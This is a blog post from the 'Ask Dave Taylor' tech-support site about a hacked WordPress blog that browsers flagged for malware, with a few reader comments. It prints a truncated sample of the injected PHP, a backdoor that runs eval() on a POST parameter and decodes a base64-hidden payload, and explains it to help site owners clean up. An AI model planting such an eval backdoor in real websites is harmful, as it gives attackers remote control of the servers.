Industry guru Dave Taylor offers tech support on technical and business topics, including iPhone, iPod, Microsoft Windows, Sony PSP, cellphones, online advertising, CSS, Web design, business, Unix, Linux, SEO, Mac OS X, and shell script programming.     


Visiting my site may harm my computer? What the heck?

As a contributing author to a weblog about South Africa's upcoming World Cup 2010 (see The South Africa Project) I was rather surprised the other day when I went to log in to our Wordpress blog, just to see the following warning in my Web browser:

website malware warning

What does it mean? How can we get this sort of warning from our own site, without ever opening up anything or getting any indication that we'd be hacked or compromised?

Our first reaction was "that's weird, why would the Web browser be reporting that the site is infected with malware?"

Turns out that modern Web browsers, including Safari and Firefox, actually check in with Google to see if the site has been tagged as having malware. Recall that "malware" is generally spyware or other software that's installed on your computer because you visit the page, often even without your being notified or even being aware it's happened. Think of a virus that's disseminated via Web page. Not good.

The different browsers show this error differently too, by the way.

The warning on the previous page is from Apple's Safari 4.0 beta. Here's what Firefox shows you:

website malware warning firefox

I tried Microsoft Internet Explorer, with the phishing controls turned on, and it still didn't have any warnings or cautions when connecting to the site. Another reason to seriously consider using a third-party Web browser, perhaps.

Anyway, when we dug into it, we quickly found that the site had indeed been compromised and that hackers had inserted bad snippets of code in the header of each page, code that started out like this:

<?php if(!function_exists('tmp_lkojfghx'))
{if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!
defined
('TMP_XHGFJOKL
'))define
('TMP_XHGFJOKL
',base64_decode
('PHNjcmlwdCBsYW5ndWFnZ...

A quick glance at this PHP code shows you that they're cunning, these hackers. They've written their malware and then encoded it, and have the script decode it when invoked (the "base64_decode"). This is so that search engines can't find it, but fortunately Google is paying attention and is one step ahead of them, correctly flagging that indeed, the site is infected with malware.

The chap doing the administrative work on the site reported that "we got hacked pretty good. They got in the database as well and changed the passwords. I fixed that, downloaded a clean copy of Wordpress and changed FTP & MySQL access."

We're still cleaning up the mess, unfortunately, but what I will say is that if you ever see a warning like we did on a site that you think is clean, stop and immediately call in someone to help you verify that it is clean and not hacked and infected by malware or other unsavory software.

i also encourage you to go read Hardening Wordpress, whether you've been hacked or not. An ounce of prevention, and all that.

More Useful Articles and Reviews Articles:
✔   Review: Verticus for iPad
iOS gamers everywhere are familiar with the genre of infinite forward progress apps - Mega Jump, Canabalt, and a host of other run/jump/fly-until-you-die...
✔   Review: Clear Spot Voyager 4G wifi hotspot
Clear Voyager 4g HotspotI'm constantly on the go and with just about every site I visit available via secure SSL connection, I typically...
✔   Review: Dropcam HD wifi video camera
Whether you're security paranoid, want to keep an eye on the nanny, have a summer or winter home you'd like to peek in...
✔   Audiovox Car Connection Review
I have the smartest house on the block with a wifi-enabled thermostat and garage door opener, along with a complex web of wireless...
✔   Review: Slingbox 500
I should start with a candid admission: I'm not a huge television watcher. I catch soccer matches on Fox Soccer Channel, and watch...
Let's stay in touch!
Sign up for my weekly AskDaveTaylor Newsletter and you'll receive even more tech and gadget help right to your inbox, along with exclusive news and industry updates. It's good stuff. I promise!
    Enter your name: and your email addr:  




Categorized: Articles and Reviews , Computer and Internet Basics   (Article 8878, Written by )
Tagged: blogging, firefox, hacking, malware, phishing, safari, security, wordpress
Previous: Why can't I download images from my Apple iPhone?
Next: Why can't my wife's Toshiba Vista laptop startup normally any more?




Reader Comments To Date: 4

Christian said, on May 9, 2009 3:11 PM:

Very helpful...thanks.

Zach said, on May 17, 2009 6:33 PM:

Greetings,

Do you know if Face Book will accept Music Widgets? I realize that My Space is a Flash style Program, and that these widgets like that environment, but I really want to know if Face Book is simillarly friendly to these programs?

Mike said, on June 25, 2009 1:37 PM:

Different people of gone to our website to conduct business with us, and have complained about receiving viruses. Also getting mailware warning.

Please help?

Christian said, on November 30, 2009 4:51 AM:

hey i really need your help!! my blog is showing the same warning too!! i dont know how to fix it.. im using blogspot. can u pls pls help me..

Starbucks coffee cup I do have a lot to say, and questions of my own for that matter, but first I'd like to say thank you, Dave, for all your helpful information by buying you a cup of coffee!

I do have a comment, now that you mention it!











I will never send you any unsolicited email. Ever.






Check This Out Too...

 
Recent Entries
Look for Answers
Recommended
Need Help? Ask Dave Taylor!
All Our Categories


Follow Me on Pinterest

Find Me on Google+
ADT on G+
© 2002 - 2013 by Dave Taylor. All Rights Reserved.

Note: This web site is for the purpose of disseminating information for educational purposes, free of charge, for the benefit of all visitors. We take great care to provide quality information. However, we do not guarantee, and accept no legal liability whatsoever arising from or connected to, the accuracy, reliability, currency or completeness of any material contained on this web site or on any linked site. Further, please note that by submitting a question or comment you're agreeing to my terms of service, which are: you relinquish any subsequent rights of ownership to your material by submitting it on this site. My lawyer says "Thanks".
"Ask Dave Taylor®" is a registered trademark of Intuitive Systems, LLC.